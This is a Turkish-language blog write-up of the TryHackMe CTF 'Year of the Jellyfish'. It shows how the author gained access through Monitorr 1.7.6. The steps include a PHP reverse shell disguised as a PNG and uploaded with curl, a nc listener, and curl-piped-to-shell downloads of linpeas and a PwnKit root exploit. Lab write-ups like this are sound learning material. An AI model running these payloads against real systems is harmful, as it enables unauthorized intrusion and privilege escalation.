top of page

Year of the Jellyfish Writeup

Yazarın fotoğrafı: Songül ÖZÜGÜRLER
Songül ÖZÜGÜRLER
28 Nis
1 dakikada okunur

Year of the Jellyfish Writeup

Year of the Jellyfish Writeup

Merhabalar bu yazımda Tryhackmede bulunan Year of the Jellyfish ctfinin çözümünü anlatmaya çalışacağım.

Year of the Jellyfish Writeup

Ctf i başlatalım ve openvpnle bağlanalım. Verilen ip adresine nmap taraması yapalım

Year of the Jellyfish Writeup

21/tcp open ftp vsftpd 3.0.322/tcp open ssh

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29

443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))

8000/tcp open http-alt

80 portunda robyns-petshop.th m adında bir site 443 te verilen bilgiye göre de 3 farklı dns bulunmakta

monitorr.robyns-petshop.thm,

beta.robyns-petshop.thm,

dev.robyns-petshop.thm

nano /etc/hosts dosyamıza bu dnsleri ve ip adresini ekleyelim

Year of the Jellyfish Writeup

Artık hepsine ulaşabiliriz.

robyns-petshop.thm ye dizin taraması yaptığımda elle tutulur bilgiler elime geçmedi . Yüzlerce sayfa vardı. Diğer sayfalarda şansımı denemeye karar verdim.

monitorr.robyns-petshop.thm

Year of the Jellyfish Writeup

Monitorr adına bir hizmet kontrolü sağlayan arayüz bulduk.

Monitorrun ana sayfasında jefflin adında bir site daha var açtığımızda ise

Year of the Jellyfish Writeup

localhost:8086 yönlendiriyor . Aynı portu ctf in kendi ip adresinde denedim.

Year of the Jellyfish Writeup

Jeflin adlı bir giriş sayfasına yönlendirdi.Monitorr adında bir exploit olup olmadığını araştırdım

Year of the Jellyfish Writeup

default olarak exploiti çalıştırdığımızda shell vermiyor

Year of the Jellyfish Writeup

Monitorr 1.7.6 yı aradığımda Remote Code Execution zafiyeti olduğunu buldum.

cat png dosyası oluşturup reverse shell yükleyelim içine

echo -e $’\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system(“bash -c \’bash -i >& /dev/tcp/10.8.128.38/443 0>&1\’”);’ > cat.png.php

Şimdi curl komutu ile oluşturduğumuz reverse shelli karşıya yüklememiz gerekiyor.

curl -k -F "fileToUpload=@./cat.png.pHp" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "Cookie: isHuman=1"

nc ile portumuzu dinleyelim ve shelli çalıştıralım

curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/cat.png.php
Year of the Jellyfish Writeup

user.txt dosyamız /var/www dizininin içinde bulunuyor . www-data kullanıcısı olarak oturum açtık.

Year of the Jellyfish Writeup

Linpeas kurarak sistemi inceleyelim.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Year of the Jellyfish Writeup

Pwnkit adında bir zafiyet olduğunu keşfettim.

Year of the Jellyfish Writeup
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

pwnkit.sh dosyasını terminale çekerek çalıştıralım

Year of the Jellyfish Writeup

root.txt dosyası /root dizinin altında bulunuyor .

 
 
bottom of page